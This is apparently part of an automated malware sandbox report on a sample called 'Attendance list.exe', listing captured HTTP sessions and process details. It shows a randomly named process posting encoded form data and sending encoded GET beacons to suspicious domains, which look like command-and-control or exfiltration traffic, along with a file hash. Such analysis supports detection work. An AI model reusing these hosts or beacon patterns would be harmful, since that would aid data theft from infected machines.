                      Accept-Encoding: gzip, deflate, br
                      Host: www.helpers-lion.online
                      Origin: http://www.helpers-lion.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.helpers-lion.online/mooq/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 62 75 75 39 4d 5a 49 6e 38 46 54 36 31 45 67 54 4f 34 46 57 67 4c 76 4c 47 2f 6c 4f 46 54 67 4f 69 62 62 4c 4c 58 56 58 55 76 76 72 54 38 45 5a 48 61 38 52 30 6b 54 5a 35 66 36 67 57 76 45 58 74 5a 53 34 51 63 44 71 64 4c 77 57 68 6c 78 45 62 76 2f 70 42 36 67 4f 4a 2b 6e 75 4c 52 6e 56 37 4d 4f 30 59 57 7a 76 38 44 6f 78 38 55 69 6f 51 6e 33 31 57 6d 6f 67 45 52 56 35 53 31 58 77 38 56 45 6a 76 4e 6a 34 66 30 6d 72 48 73 56 62 7a 4c 6c 52 37 79 32 73 66 59 6f 32 33 35 4e 45 [TRUNCATED]
                      Data Ascii: 66s0QHx=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYbuu9MZIn8FT61EgTO4FWgLvLG/lOFTgOibbLLXVXUvvrT8EZHa8R0kTZ5f6gWvEXtZS4QcDqdLwWhlxEbv/pB6gOJ+nuLRnV7MO0YWzv8Dox8UioQn31WmogERV5S1Xw8VEjvNj4f0mrHsVbzLlR7y2sfYo235NEITvVQhmOmbpCT1nHQt96q5JUCK1uWjyulrDMBYqy34k65tRtH2I0sCMDIk7Z0dh7R1+hjQaxOPM8bt46Uw/SDsIeeNdQKJOjaZDIMOBHyLlhw5KW63SPWl5zoUmAkgwvT0qnZJf/wFUbMsGvVIY6c6m6hBOjR9QjPQuuH3qVREkObjeby7SXONfF8ciDB0y3Lxz715sJIYro+S07it6tejwvIByCgWQBbfs3pAXGMmw0/SK3HMatCyr6i76pdQcaJ7m745tW7SG/0kUVC1hn3irBfC+53fdULj6JwDlXi8vrnXDcgfxuUetREtjPoMGLSmmvwLxMjvdGH9SXsgYRj+qFrUdO6Zc0HQQ5ZP1JMDL/Gt06iw38c1MKXXAAzHGSikCdltif2vdtsyVIbYJl8/lziM7Yst4k1Jt/tZzPz8QmaqBe93TGPbGfKk9NxfVTp34V4SDhkSPLMWQXXQTiGvPCUdZqQAtlFIc75WGArFacFdvXkZwsNUO1IVhm4WbBpmiqzEU0QySiSBi9eUIrNfHTiW0Mm8dLBObB50f+0G1nGnNi4Lr82BD3fGuqUKO2cXo2xKuTSze87Npk9AqOjJ1FEz1i3j7N1MEz4TAr9IKWPMNi6VJ/WYuNL73EwQl50Gj7ZwC0xlsVmH9X4BoPxXD1rJ9CUkAWYx [TRUNCATED]
                      Jul 2, 2024 07:18:25.903903961 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:25 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                      Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                      Jul 2, 2024 07:18:25.903991938 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                      Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                      Jul 2, 2024 07:18:25.904004097 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                      Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                      Jul 2, 2024 07:18:25.904345989 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                      Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.549752194.58.112.174806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:27.780798912 CEST529OUTGET /mooq/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.helpers-lion.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:18:28.479067087 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:18:28 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                      Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                      Jul 2, 2024 07:18:28.479089975 CEST224INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                      Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h
                      Jul 2, 2024 07:18:28.479099035 CEST1236INData Raw: 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1
                      Data Ascii: 1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_s
                      Jul 2, 2024 07:18:28.479327917 CEST1236INData Raw: 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e
                      Data Ascii: mage b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nb
                      Jul 2, 2024 07:18:28.479340076 CEST1236INData Raw: 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69
                      Data Ascii: ing" href="https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amo
                      Jul 2, 2024 07:18:28.479352951 CEST1236INData Raw: 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b
                      Data Ascii: mpact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nb
                      Jul 2, 2024 07:18:28.479922056 CEST1236INData Raw: 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63
                      Data Ascii: www.helpers-lion.online&utm_medium=parking&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image
                      Jul 2, 2024 07:18:28.479932070 CEST552INData Raw: bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b8 26 6e 62 73 70 3b d1 83 d0 bb d1 83 d1 87 d1 88 d0 b8 d1 82 d0 b5 20 d0 b5 d0 b3 d0 be 20 53 45 4f 2d d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0
                      Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="
                      Jul 2, 2024 07:18:28.479942083 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 3e 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: if ( links[ i ].href.indexOf('?') >= 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; }
                      Jul 2, 2024 07:18:28.479952097 CEST1236INData Raw: 20 28 20 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 70 61 6e 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68
                      Data Ascii: ( var i = 0; i < spans.length; i++) { if ( spans[ i ].className.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text;
                      Jul 2, 2024 07:18:28.480537891 CEST133INData Raw: 61 74 63 68 2f 35 34 32 30 30 39 31 34 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 22 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 21
                      Data Ascii: atch/54200914" style="position:absolute; left:-9999px;" alt=""></div></noscript>... /Yandex.Metrika counter --></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.549753172.67.210.102806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:33.529294968 CEST778OUTPOST /lfkn/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.dmtxwuatbz.cc
                      Origin: http://www.dmtxwuatbz.cc
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.dmtxwuatbz.cc/lfkn/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 51 70 69 6b 74 2f 64 52 4d 64 44 38 2b 4d 5a 6a 56 35 66 32 34 65 4b 6d 37 2b 32 57 69 6c 31 48 68 42 65 69 67 41 3d
                      Data Ascii: 66s0QHx=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDQpikt/dRMdD8+MZjV5f24eKm7+2Wil1HhBeigA=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.549754172.67.210.102806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:36.061328888 CEST798OUTPOST /lfkn/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.dmtxwuatbz.cc
                      Origin: http://www.dmtxwuatbz.cc
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.dmtxwuatbz.cc/lfkn/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 79 79 32 6f 32 42 48 53 45 63 64 43 52 75 38 33 58 54 68 64 77 76 47 6b 53 6e 6a 76 79 4e 43 61 5a 2f 2f 66 4a 59
                      Data Ascii: 66s0QHx=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lYyy2o2BHSEcdCRu83XThdwvGkSnjvyNCaZ//fJY


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.549755172.67.210.102806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:38.591787100 CEST1815OUTPOST /lfkn/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.dmtxwuatbz.cc
                      Origin: http://www.dmtxwuatbz.cc
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.dmtxwuatbz.cc/lfkn/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 74 75 79 35 49 52 6c 32 31 30 79 71 6d 76 39 49 61 30 56 47 45 35 58 45 55 55 2b 41 79 30 68 65 77 57 44 7a 37 6b 33 63 33 57 44 62 4a 75 77 70 38 33 5a 33 4a 70 59 62 73 47 72 33 66 70 71 77 41 78 54 64 4e 6e 45 56 4d 76 58 4c 47 39 6d 53 47 78 56 30 39 63 47 58 2f 34 65 4a 48 48 42 36 41 67 77 4b 37 34 5a 56 6e 71 6c 61 77 65 34 47 72 55 47 47 75 52 59 46 31 45 52 72 37 6d 2f 4c 56 63 49 44 36 46 62 57 74 44 4b 6e 2b 56 78 51 69 4b 55 66 52 49 62 57 6d 55 34 4f 6c 38 78 78 [TRUNCATED]
                      Data Ascii: 66s0QHx=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAOtuy5IRl210yqmv9Ia0VGE5XEUU+Ay0hewWDz7k3c3WDbJuwp83Z3JpYbsGr3fpqwAxTdNnEVMvXLG9mSGxV09cGX/4eJHHB6AgwK74ZVnqlawe4GrUGGuRYF1ERr7m/LVcID6FbWtDKn+VxQiKUfRIbWmU4Ol8xx/JTCB4XdJM95fyR01R1fF2Z5H0RWhK5UX1RstW0EBImie9DwSfZ3rdUnTzuZWg/aIZdcSbRWVuxaP/slyo3r5wXud9nn3V9JqpYuLI2oDJu2EXLIpjGcx7n2tB6/dYFJXYzlHVvSGZfuwzI1DNBShOPbzQk4IsIXdAl14XlV44RrGuTH2IsyyxdG/yPVRm+cs65klQlXupE3+p5qqcveW1fDvzoPBlmmY/+rzuuI6Wr8Q876f8WaoYNJDHtdRfIDzN6d1Sq0UAYStrlUGfJd5wx54Rk7MmtNLkvXPcf2s53GRutYM0oAKcB1NNgUqRoQgUtwNQKP7sohOYxoqvHrU6fFY7PXIjq9cXvpXPtQD0O2GcRmTTY2z71uvF2SUXGe2pIm5t4Mf8Kh6tB1kge8FmmfN6++KvBWw0Kl7qzM4J6BuCjtD+lDSNrnMyKKIt3r95vkc4cqYko7bdCMMKS3lAMU3oVuI86moD/1R0oWDM8zUONvJZum+DSlOB+ws7cfw3vcMtubKwdDTyHzbaizr+awV2Vj/xL/gaWg65nJmCqAa8Y2p3e0GFwj/uibwpaT7WwaaMsSBiIKy+stKCx44nCrd50RjHvNEMoDdIniA0ILbFaAgmKX0JCtVPVTsx4xO4IKzauTCsJMr+wpoTN8mpmVoHc0sDKefH [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.549756172.67.210.102806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:41.124767065 CEST523OUTGET /lfkn/?66s0QHx=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT4CuBs9Ly3z32vNrKxrasIe0t0HCtUE4LbxPxJKDUCSn2XA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.dmtxwuatbz.cc
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:01:14:48
                      Start date:02/07/2024
                      Path:C:\Users\user\Desktop\Attendance list.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Attendance list.exe"
                      Imagebase:0x8c0000
                      File size:1'193'472 bytes
                      MD5 hash:8A08778411F99D8DB7790CB7F0A84E3B
                      Has elevated privileges:true
                      Has administrator privileges:true
